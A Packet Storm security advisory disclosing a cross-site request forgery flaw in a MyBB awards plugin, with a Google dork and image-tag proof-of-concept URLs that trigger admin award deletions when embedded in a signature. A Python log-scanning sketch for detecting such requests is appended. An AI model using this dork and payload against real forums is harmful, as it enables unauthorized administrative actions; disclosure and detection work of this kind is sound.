MyBB 1.6.15 Cross Site Request Forgery

2014-08-22T00:00:00
ID PACKETSTORM:127992
Type packetstorm
Reporter Vagineer
Modified 2014-08-22T00:00:00

Description

                                        
```
# Google Dork: allinurl:myawards.php
# Date: 08/17/2014
# Exploit Author: Vagineer https://vagineering.me
# Version: ALL VERSIONS
# Tested on: MyBB 1.6.15

PoC (set this as your signature or iframe it)
Add awards
[img]
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
[/img]
Remove awards
[img]
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1
[/img]
```
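A detection sketch for the request pattern in the PoC above, added here as an example and not part of the original advisory: it scans combined-format access logs for GET requests that carry an `action` parameter to the admin `index.php` but whose Referer is missing or is not an admin page. The log lines are constructed, and the helper name `suspicious_admin_gets` and the combined log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [22/Aug/2014:10:01:02 +0000] "GET /forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1 HTTP/1.1" 200 512 "https://website.com/forum/showthread.php?tid=5" "Mozilla/5.0"
203.0.113.7 - - [22/Aug/2014:10:03:10 +0000] "GET /forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1 HTTP/1.1" 200 512 "https://website.com/forum/admin/index.php?module=user-awards" "Mozilla/5.0"
203.0.113.7 - - [22/Aug/2014:10:04:00 +0000] "GET /forum/admin/index.php?module=user-awards HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [22/Aug/2014:10:05:00 +0000] "GET /forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)

def suspicious_admin_gets(log_text, admin_dir="/admin/"):
    """Hypothetical helper: return (ip, timestamp, action, referer) for GET
    requests that carry an `action` parameter to the admin index.php while the
    Referer is absent or is not itself a page under the admin directory."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        url = urlsplit(m["target"])
        query = parse_qs(url.query)
        if not url.path.endswith(admin_dir + "index.php") or "action" not in query:
            continue
        ref = m["referer"]
        ref_path = urlsplit(ref).path if ref != "-" else ""
        # An admin action reached from a thread page, an external site, or with
        # no Referer at all did not come from a click inside the admin panel.
        if admin_dir not in ref_path:
            hits.append((m["ip"], m["ts"], query["action"][0], ref))
    return hits

if __name__ == "__main__":
    for hit in suspicious_admin_gets(SAMPLE_LOG):
        print(hit)
```

Browsers can omit the Referer for legitimate requests, so hits are leads to correlate with admin session activity rather than confirmed forgeries.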